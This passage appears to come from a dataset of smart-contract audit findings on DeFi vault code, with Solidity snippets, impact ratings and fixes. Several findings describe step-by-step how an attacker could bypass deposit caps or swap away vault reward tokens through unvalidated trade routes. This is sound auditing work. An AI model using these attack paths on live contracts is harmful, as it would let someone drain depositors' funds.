```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n
Game doesn't accrue rewards for the previous rebalance period when rebalanceBasket is called in the next period
medium
Game doesn't accrue rewards for the previous rebalance period when `rebalanceBasket` is called in the next period. Because of that, the user does not receive rewards for the previous period, and if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for the last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows the user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When the user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, i.e. after rewards for the previous period have accrued. And when allocations are sent to the xController, a new rebalance period is started. So reward accrual for the period the user allocated for actually starts once `pushAllocationsToController` is called. 
And at this point currentRebalancingPeriod == lastRebalancingPeriod, which means that if the user calls rebalanceBasket for the next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So he will actually not receive rewards for the previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.The user calls `rebalanceBasket` with a new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.Now the user can call `rebalanceBasket` for the next, 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == lastRebalancingPeriod == 11`, so rewards were not accrued for the 11th cycle. 6.The new allocation is saved and `lastRebalancingPeriod` becomes 12. 7.The loop continues, and every time the user allocates for the next period his `lastRebalancingPeriod` is increased, but rewards are not added. 8.The user will receive his rewards for the previous cycle only if he skips one rebalance period (he doesn't allocate in that period).\\nAs you can see, this is a very serious bug. Because of it, a player that wants to adjust his allocation every rebalance period will lose all his rewards.
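The off-by-one can be condensed into a toy Python model (hypothetical flat reward per period; not the contract code):

```python
# Rewards accrue only when currentRebalancingPeriod > lastRebalancingPeriod,
# so a user who rebalances every period accrues nothing.
def add_to_total_rewards(current_period: int, last_period: int,
                         reward_per_period: int) -> int:
    if current_period <= last_period:   # report suggests `<` here instead
        return 0
    return (current_period - last_period) * reward_per_period

# user allocated for period 11 (lastRebalancingPeriod = 11); period 11
# starts and settles; the user rebalances again for period 12:
assert add_to_total_rewards(11, 11, 100) == 0    # period 11's reward lost
# a user who skipped one period does get paid:
assert add_to_total_rewards(12, 11, 100) == 100
```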
First, allow `rebalanceBasket` to be called only once per rebalance period, before the new rebalancing period starts and allocations are sent to the xController. Then change the check inside `addToTotalRewards` to `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for the same period.
Player loses all his rewards
```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n
MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFunds
medium
MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFunds. Because of that, a shortage can occur if the vault loses some underlying during cross-chain calls and `reservedFunds` will not be present in the vault.\\n`reservedFunds` is the amount reserved to be withdrawn by users. It is increased by the `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\nThe `setXChainAllocation` call is initiated by the xController and provides the vault with information about funds. If the vault should send funds to the xController, the `SendingFundsXChain` state is set and the amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, the function just pulls the needed funds from providers and sends them to the xController. It doesn't check that the amount held by the vault afterwards is enough to cover `reservedFunds`. Because of that, the following situation can occur.\\n1.Suppose that the vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that the vault should send 800 tokens to the xController (vault allocation is 0) and 200 should stay in the vault in order to cover `reservedFunds`. 
4.When the vault is about to send the 800 tokens (between the `setXChainAllocation` and `rebalanceXChain` calls), a loss happens and totalUnderlying becomes 800, so the vault now has only 800 tokens in total. 5.The vault sends these 800 tokens to the xController and has 0 left to cover `reservedFunds`, although in this case it should have kept the 200 tokens in the vault.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think this is an incorrect approach to withdrawing funds, as there is a risk that something happens to the underlying amount in the providers so that it is not enough to cover `reservedFunds`; calculations will be broken and users will not be able to withdraw. The same approach is taken in the `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess the correct approach is not to touch the `reservedFunds` amount: if you need to send an amount to the xController, withdraw it directly from the provider. Of course, if `getVaultBalance` is bigger than `reservedFunds + amountToSendXChain`, then you can send funds directly, without pulling.
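The numeric scenario above can be checked with a small Python sketch (a hypothetical model of `rebalanceXChain`; the vault is reduced to a dict and no cross-chain transfer actually happens):

```python
# Mirrors the two balance checks in rebalanceXChain: the send amount is capped
# at the vault balance, but reservedFunds is never taken into account.
def rebalance_x_chain(vault):
    amount = min(vault["amount_to_send"], vault["balance"])  # pullFunds/cap logic
    vault["balance"] -= amount  # transferred to the xController
    return amount

vault = {"balance": 1000, "amount_to_send": 800, "reserved_funds": 200}

# Loss occurs between setXChainAllocation and rebalanceXChain.
vault["balance"] = 800

sent = rebalance_x_chain(vault)
print(sent, vault["balance"])  # 800 0 -- nothing left to cover the 200 reserved
shortage = max(0, vault["reserved_funds"] - vault["balance"])
print(shortage)  # 200
```

A post-send check such as `vault["balance"] >= vault["reserved_funds"]` would have reverted this transfer.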
You need to check that after sending funds to the xController, enough funds remain in the vault to cover `reservedFunds`.
Reserved funds protection can be broken
```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n
maxTrainingDeposit can be bypassed
medium
It was observed that a user can bypass `maxTrainingDeposit` by transferring his balance to another account.\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if the user's balance exceeds `maxTrainingDeposit`, the request fails (assuming `training` is true).\\nLet's say User A has a balance of 50 and `maxTrainingDeposit` is 100.\\nIf User A deposits 51, it fails since 50+51<=100 is false.\\nSo User A transfers the 50 to another account of his.\\nNow when User A deposits, it does not fail since `0+51<=100`
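The bypass is plain arithmetic; a minimal Python sketch (assuming an `exchangeRate` of 1 and ignoring share mechanics) shows why splitting the balance defeats the check:

```python
MAX_TRAINING_DEPOSIT = 100  # hypothetical cap from the example

def deposit_allowed(balance_sender, amount):
    # Mirrors: require(_amount + balanceSender <= maxTrainingDeposit);
    return amount + balance_sender <= MAX_TRAINING_DEPOSIT

# User A holds 50 and tries to deposit 51 more: blocked (50 + 51 > 100).
print(deposit_allowed(50, 51))  # False

# User A first transfers the 50 shares to a second account, then deposits.
print(deposit_allowed(0, 51))   # True -- cap bypassed
```

The check only sees the sender's current balance, so any balance parked elsewhere is invisible to it.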
If a user-specific limit is required, then transfers should be checked as below:\\n```\\n require(_amountTransferred + balanceRecipient <= maxTrainingDeposit);\\n```\\n
User can bypass maxTrainingDeposit and deposit more than allowed
```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n
Risk of reward tokens being sold by malicious users under certain conditions
high
Due to the lack of validation of the selling token within the Curve adaptors, there is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. if reward tokens are equal to primary/secondary tokens OR a new exploit is found in other parts of the code).\\nFor an `EXACT_IN_SINGLE` trade within the Curve adaptors, the `from` and `to` addresses of the `exchange` function are explicitly set to `trade.sellToken` and `trade.buyToken` respectively. Thus, the swap is restricted to only `trade.sellToken` and `trade.buyToken`, which point to either the primary or secondary token of the pool. This prevents other tokens that reside in the vault from being swapped out.\\nHowever, this measure was not applied to the `EXACT_IN_BATCH` trade, as it ignores `trade.sellToken` and `trade.buyToken` and allows the caller to define an arbitrary `data.route` where the first route (_route[0]) and last route (_route[last_index]) could be any token.\\nThe vault will hold the reward tokens (CRV, CVX, LDO) when the vault administrator claims the rewards or a malicious user claims the rewards on behalf of the vault by calling Convex's getReward function.\\nAssume that the attacker is faster than the admin in calling the reinvest function. There is a possibility that an attacker executes an `EXACT_IN_BATCH` trade, specifies `_route[0]` as one of the reward tokens residing in the vault, and swaps away the reward tokens during depositing (_tradePrimaryForSecondary) or redemption (_sellSecondaryBalance). 
In addition, an attacker could also sell away the Convex deposit tokens if a new exploit is found.\\nIn addition, the vault also holds Convex deposit tokens, which represent assets held by the vault.\\nThis issue affects the in-scope `CurveV2Adapter` and `CurveAdapter` since they do not validate the `data.route` provided by the users.\\nCurveV2Adapter\\n```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n\\nCurveAdapter\\n```\\nFile: CurveAdapter.sol\\n function _exactInBatch(Trade memory trade) internal view returns (bytes memory executionCallData) {\\n CurveBatchData memory data = abi.decode(trade.exchangeData, (CurveBatchData));\\n\\n return abi.encodeWithSelector(\\n ICurveRouter.exchange.selector,\\n trade.amount,\\n data.route,\\n data.indices,\\n trade.limit\\n );\\n }\\n```\\n\\nFollowing are some examples of where this vulnerability could potentially be exploited. 
Assume a vault that supports the CurveV2's ETH/stETH pool.\\nPerform the smallest possible redemption to trigger the `_sellSecondaryBalance` function. Configure the `RedeemParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the primary token (ETH). This will cause the `finalPrimaryBalance` to increase by the number of incoming primary tokens (ETH), thus inflating the number of primary tokens redeemed.\\nPerform the smallest possible deposit to trigger the `_tradePrimaryForSecondary`. Configure `DepositTradeParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the secondary tokens (stETH). This will cause the `secondaryAmount` to increase by the number of incoming secondary tokens (stETH), thus inflating the number of secondary tokens available for the deposit.\\nUpon further investigation, it was observed that the vault would only approve the exchange to pull the `trade.sellToken`, which points to either the primary token (ETH) or secondary token (stETH). Thus, the reward tokens (CRV, CVX, or LDO) or Convex deposit tokens cannot be sent to the exchanges. Thus, the vault will not be affected if none of the reward tokens/Convex Deposit tokens equals the primary or secondary token.\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? 
trade.amount : trade.limit;\\n address sellToken = trade.sellToken;\\n // approve WETH instead of ETH for ETH trades if\\n // spender != address(0) (checked by the caller)\\n if (sellToken == Constants.ETH_ADDRESS) {\\n sellToken = address(Deployments.WETH);\\n }\\n IERC20(sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\nHowever, there might be some Curve Pools or Convex's reward contracts whose reward tokens are similar to the primary or secondary tokens of the vault. If the vault supports those pools, the vault will be vulnerable. In addition, the reward tokens of a Curve pool or Convex's reward contracts are not immutable. It is possible for the governance to add a new reward token that might be the same as the primary or secondary token.
It is recommended to implement additional checks when performing a `EXACT_IN_BATCH` trade with the `CurveV2Adapter` or `CurveAdapter` adaptor. The first item in the route must be the `trade.sellToken`, and the last item in the route must be the `trade.buyToken`. This will restrict the `trade.sellToken` to the primary or secondary token, and prevent reward and Convex Deposit tokens from being sold (Assuming primary/secondary token != reward tokens).\\n```\\nroute[0] == trade.sellToken\\nroute[last index] == trade.buyToken\\n```\\n\\nThe vault holds many Convex Deposit tokens (e.g. cvxsteCRV). A risk analysis of the vault shows that the worst thing that could happen is that all the Convex Deposit tokens are swapped away if a new exploit is found, which would drain the entire vault. For defense-in-depth, it is recommended to check that the selling token is not a Convex Deposit token under any circumstance when using the trade adaptor.\\nThe trade adaptors are one of the attack vectors that the attacker could potentially use to move tokens out of the vault if any exploit is found. Thus, they should be locked down or restricted where possible.\\nAlternatively, consider removing the `EXACT_IN_BATCH` trade function from the affected adaptors to reduce the attack surface if the security risk of this feature outweighs the benefit of the batch function.
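The recommended endpoint check can be sketched as a standalone helper (hypothetical Python model; route entries are shown as plain strings, and the zero-address padding that Curve routers use for unused hops is trimmed first):

```python
ZERO = "0x0000000000000000000000000000000000000000"

def validate_route(route, sell_token, buy_token):
    # Trim the zero-address padding of unused hops before checking endpoints.
    hops = [addr for addr in route if addr != ZERO]
    # route[0] == trade.sellToken and route[last index] == trade.buyToken
    return bool(hops) and hops[0] == sell_token and hops[-1] == buy_token

# A legitimate primary -> secondary swap passes.
print(validate_route(["ETH", "pool", "stETH", ZERO], "ETH", "stETH"))  # True

# A route that smuggles a reward token in as the sell leg is rejected.
print(validate_route(["CRV", "pool", "stETH", ZERO], "ETH", "stETH"))  # False
```

With this guard, `EXACT_IN_BATCH` is constrained to the same sell/buy pair that `EXACT_IN_SINGLE` already enforces.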
There is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. if reward tokens are equal to primary/secondary tokens OR a new exploit is found in other parts of the code), thus potentially draining assets from the vault.
```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n
Slippage/Minimum amount does not work during single-side redemption
high
The slippage or minimum amount of tokens to be received is set to a value much smaller than expected due to the use of `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount on behalf of the callers during a single-sided redemption. As a result, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `Curve2TokenConvexHelper._executeSettlement` function is called by the following functions:\\n`Curve2TokenConvexHelper.settleVault`\\n`Curve2TokenConvexHelper.settleVault` function is called within the `Curve2TokenConvexVault.settleVaultNormal` and `Curve2TokenConvexVault.settleVaultPostMaturity` functions\\n`Curve2TokenConvexHelper.settleVaultEmergency`\\n`Curve2TokenConvexHelper.settleVaultEmergency` is called by `Curve2TokenConvexVault.settleVaultEmergency`\\nIn summary, the `Curve2TokenConvexHelper._executeSettlement` function is called during vault settlement.\\nAn important point to note here is that within the `Curve2TokenConvexHelper._executeSettlement` function, the `params.minPrimary` and `params.minSecondary` are automatically computed and overwritten by the `TwoTokenPoolUtils._getMinExitAmounts` function (Refer to Line 124 below). Therefore, if the caller attempts to define the `params.minPrimary` and `params.minSecondary`, they will be discarded and overwritten. 
The `params.minPrimary` and `params.minSecondary` is for slippage control when redeeming the Curve's LP tokens.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\nThe `TwoTokenPoolUtils._getMinExitAmounts` function calculates the minimum amount on the share of the pool with a small discount.\\nAssume a Curve Pool with the following configuration:\\nConsist of two tokens (DAI and USDC). 
DAI is primary token, USDC is secondary token.\\nPool holds 200 US Dollars worth of tokens (50 DAI and 150 USDC).\\nDAI <> USDC price is 1:1\\ntotalSupply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (50 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 50 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 24.9375 DAI\\n\\nminSecondary = same calculation = 74.8125 USDC\\n```\\n\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `24.9375 DAI` as `params.minPrimary` and `74.8125 USDC` as `params.minSecondary`.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen settling the vault, it is possible to instruct the vault to redeem the Curve's LP tokens single-sided 
or proportionally. Settle vault functions will trigger a chain of functions that will eventually call the `Curve2TokenConvexHelper._unstakeAndExitPool` function that is responsible for redeeming the Curve's LP tokens.\\nWithin the `Curve2TokenConvexHelper._unstakeAndExitPool` function, if the `params.secondaryTradeParams.length` is zero, the redemption will be single-sided (refer to Line 242 below). Otherwise, the redemption will be executed proportionally (refer to Line 247 below). For a single-sided redemption, only the `params.minPrimary` will be used.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _unstakeAndExitPool(\\n Curve2TokenPoolContext memory poolContext,\\n ConvexStakingContext memory stakingContext,\\n uint256 poolClaim,\\n RedeemParams memory params\\n ) internal returns (uint256 primaryBalance, uint256 secondaryBalance) {\\n // Withdraw pool tokens back to the vault for redemption\\n bool success = stakingContext.rewardPool.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n if (!success) revert Errors.UnstakeFailed();\\n\\n if (params.secondaryTradeParams.length == 0) {\\n // Redeem single-sided\\n primaryBalance = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity_one_coin(\\n poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary\\n );\\n } else {\\n // Redeem proportionally\\n uint256[2] memory minAmounts;\\n minAmounts[poolContext.basePool.primaryIndex] = params.minPrimary;\\n minAmounts[poolContext.basePool.secondaryIndex] = params.minSecondary;\\n uint256[2] memory exitBalances = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity(\\n poolClaim, minAmounts\\n );\\n\\n (primaryBalance, secondaryBalance) \\n = (exitBalances[poolContext.basePool.primaryIndex], exitBalances[poolContext.basePool.secondaryIndex]);\\n }\\n }\\n```\\n\\nAssume that the caller decided to perform a single-sided redemption of 50 LP Pool Tokens, using the earlier example. 
In this case,\\n`poolClaim` = 50 LP Pool Tokens\\n`params.minPrimary` = 24.9375 DAI\\n`params.minSecondary` = 74.8125 USDC\\nThe data passed into the `remove_liquidity_one_coin` will be as follows:\\n```\\n@notice Withdraw a single coin from the pool\\n@param _token_amount Amount of LP tokens to burn in the withdrawal\\n@param i Index value of the coin to withdraw\\n@param _min_amount Minimum amount of coin to receive\\n@return Amount of coin received\\ndef remove_liquidity_one_coin(\\n _token_amount: uint256,\\n i: int128,\\n _min_amount: uint256\\n) -> uint256:\\n```\\n\\n```\\nremove_liquidity_one_coin(poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary);\\nremove_liquidity_one_coin(50 LP_TOKEN, Index 0=DAI, 24.9375 DAI);\\n```\\n\\nAssume the pool holds 200 US dollars worth of tokens (50 DAI and 150 USDC), and the total supply is 100 LP Tokens. The pool's state is imbalanced, so any trade will result in significant slippage.\\nIntuitively (ignoring the slippage & fee), redeeming 50 LP Tokens should return approximately 100 US dollars worth of tokens, which means around 100 DAI. Thus, the slippage or minimum amount should ideally be around 100 DAI (+/- 5%).\\nHowever, the trade will be executed in the above example even if the vault receives only 25 DAI because the `params.minPrimary` is set to `24.9375 DAI`. This could result in a loss of around 75 DAI due to slippage (about 75% slippage rate) in the worst-case scenario.
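The worked numbers can be verified directly; the sketch below (illustrative Python using float arithmetic instead of the contract's fixed-point math) reproduces `_getMinExitAmounts` for the imbalanced 50 DAI / 150 USDC pool:

```python
def get_min_exit_amounts(primary_bal, secondary_bal, pool_claim,
                         total_supply, slippage_limit=0.9975):
    # Min amounts are the claimed share of each reserve, with a 0.25% discount.
    share = pool_claim / total_supply
    return primary_bal * share * slippage_limit, secondary_bal * share * slippage_limit

min_primary, min_secondary = get_min_exit_amounts(50, 150, 50, 100)
print(min_primary, min_secondary)  # 24.9375 74.8125

# A single-sided redemption of half this pool is intuitively worth ~100 DAI,
# yet the auto-computed floor only protects down to ~24.94 DAI.
fair_single_sided_value = 100
```

Because the floor is a share of the primary reserve only, it is far below the fair single-sided value whenever the pool is skewed away from the primary token.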
When performing a single-side redemption, avoid using the `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount of tokens to receive on behalf of the caller. Instead, give the caller the flexibility to define the slippage (params.minPrimary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a single-side trade (remove_liquidity_one_coin) is to call the Curve Pool's `calc_withdraw_one_coin` function off-chain to calculate the amount received when withdrawing a single LP Token, and then apply an acceptable discount.\\nNote that the `calc_withdraw_one_coin` function cannot be used solely on-chain for computing the minimum amount because the result can be manipulated since it uses spot balances for computation.
The slippage or minimum amount of tokens to be received is set to a value much smaller than expected. Thus, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.
```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n
Reinvest will return sub-optimal return if the pool is imbalanced
high
Reinvesting only allows proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.\\nDuring reinvest rewards, the vault will ensure that the amount of primary and secondary tokens deposited is of the right proportion per the comment in Line 163 below.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nThe `Curve2TokenConvexHelper.reinvestReward` function will internally call the `Curve2TokenPoolUtils._checkPrimarySecondaryRatio`, which will check that the primary and secondary tokens deposited are of the right proportion.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 